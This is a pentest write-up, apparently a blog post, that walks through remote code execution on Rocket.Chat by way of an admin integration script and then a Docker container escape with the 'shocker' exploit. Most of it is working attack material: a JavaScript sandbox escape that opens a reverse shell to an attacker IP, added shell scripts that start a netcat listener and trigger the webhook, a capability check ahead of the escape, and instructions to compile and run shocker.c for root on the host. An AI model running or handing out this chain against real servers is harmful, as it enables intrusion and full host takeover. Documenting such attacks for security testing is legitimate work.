
Pentest: Rocket.Chat RCE + Docker container escape PoC (shocker) to read any file on the host (priv esc)

Affected application: Rocket.Chat

official site : https://rocket.chat/


Situation:

  • Log in as a moderator or admin (integrations can only be created by a privileged user).

After logging in, go to Integrations and create a new integration.


Choose an active channel for it (in my case it was GENERAL).


Add the following JS code as the integration script. It escapes the script sandbox through the host's Function constructor and spawns a reverse shell:


// Sandbox escape: console.log is passed in from the host context, so its
// constructor is the host's Function(), which runs outside the sandbox and
// can reach process.mainModule.require.
const require = console.log.constructor('return process.mainModule.require')();
// Spawn a shell and wire its stdio to a TCP connection back to the attacker.
var net = require("net"),
    cp = require("child_process"),
    sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(1234, "XX.XX.XX.XX", function() { // attacker IP and listener port
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
});


Start a netcat listener on the same port (1234 in the script above) and curl the webhook URL so Rocket.Chat evaluates the script.

And voilà, we got a reverse shell!
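The trigger step written out, as an added shell example that is not part of the original post. It assumes the integration is an incoming webhook whose URL has the form https://<server>/hooks/<integration-id>/<token>, that the attacker host can reach the target and has nc installed, and that the port matches the one in the JS payload; the server name, integration id and token are placeholders.

```shell
#!/bin/sh
# Added example: start the listener and fire the webhook so Rocket.Chat
# evaluates the integration script. Not from the original post.

LPORT=1234                      # must match the port in the JS payload

# Build the incoming-webhook URL. Assumption: Rocket.Chat exposes it as
# https://<server>/hooks/<integration-id>/<token>; all three are placeholders.
webhook_url() {
    printf 'https://%s/hooks/%s/%s' "$1" "$2" "$3"
}

# Minimal JSON body for an incoming webhook. The content is irrelevant:
# the request only has to reach the integration so its script gets run.
webhook_payload() {
    printf '{"text":"%s"}' "$1"
}

# POST to the webhook URL. Returns curl's exit status (0 = request sent).
trigger_webhook() {
    curl -s -k -X POST -H 'Content-Type: application/json' \
        -d "$(webhook_payload 'ping')" "$1" >/dev/null
}

# Usage: ./trigger.sh chat.example.org INTEGRATION_ID TOKEN
if [ "$#" -eq 3 ]; then
    url=$(webhook_url "$1" "$2" "$3")
    # Listener in the background; the JS payload connects back to it.
    nc -lvnp "$LPORT" &
    sleep 1
    trigger_webhook "$url" && echo "webhook sent to $url, waiting for shell"
    wait
fi
```

The listener is started before the request because the script runs synchronously on the server when the webhook fires; if nothing is listening on the port the connect fails and you only get to retry by curling again.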



The shell lands inside a Docker container. Using the following PoC ("shocker") with small edits, I was able to get root privileges on the host. It abuses open_by_handle_at(), which the kernel only permits with CAP_DAC_READ_SEARCH, a capability old Docker releases left in the container's default set:

http://stealth.openwall.net/xSports/shocker.c


Compile it locally, upload the binary to the container and run it.
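Before compiling and uploading anything, it is worth checking that the container still holds the capability shocker depends on. This added shell snippet (not part of the original post, and not part of shocker.c) decodes the effective capability mask from /proc/self/status and tells you whether CAP_DAC_READ_SEARCH is present; the bit index comes from linux/capability.h, and the two sample masks are constructed values for reference, not captured from a target.

```shell
#!/bin/sh
# Added example: does this container still have CAP_DAC_READ_SEARCH?
# shocker.c needs it for open_by_handle_at(). Not from the original post.

CAP_DAC_READ_SEARCH=2          # bit index from linux/capability.h

# has_cap HEXMASK BIT -> exit 0 if BIT is set in the capability mask
# (masks are the 64-bit hex values printed in /proc/<pid>/status).
has_cap() {
    mask=$1
    bit=$2
    [ $(( (0x$mask >> bit) & 1 )) -eq 1 ]
}

# Print the current effective capability mask, i.e. the hex value after
# "CapEff:" in /proc/self/status (empty if /proc is not available).
current_capeff() {
    awk '/^CapEff:/ { print $2 }' /proc/self/status 2>/dev/null
}

# shocker_possible -> 0 if the effective set includes CAP_DAC_READ_SEARCH,
# 1 if it was dropped, 2 if /proc/self/status could not be read.
shocker_possible() {
    eff=$(current_capeff)
    [ -n "$eff" ] || return 2
    has_cap "$eff" "$CAP_DAC_READ_SEARCH"
}

# Constructed sample masks for reference (not captured from a target):
DOCKER_DEFAULT_MASK=00000000a80425fb   # Docker's default cap set: bit 2 clear
FULL_CAP_MASK=0000003fffffffff         # root with every cap (older kernels): bit 2 set

rc=0
shocker_possible || rc=$?
case $rc in
    0) echo "CAP_DAC_READ_SEARCH present: shocker can read host files" ;;
    2) echo "cannot read /proc/self/status; check manually with capsh --print" ;;
    *) echo "CAP_DAC_READ_SEARCH dropped: open_by_handle_at() will fail with EPERM" ;;
esac
```

If the capability is missing, shocker will not work as-is whatever you edit in it; the check saves an upload and a noisy failed run on the target.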




And yeah, we got root!
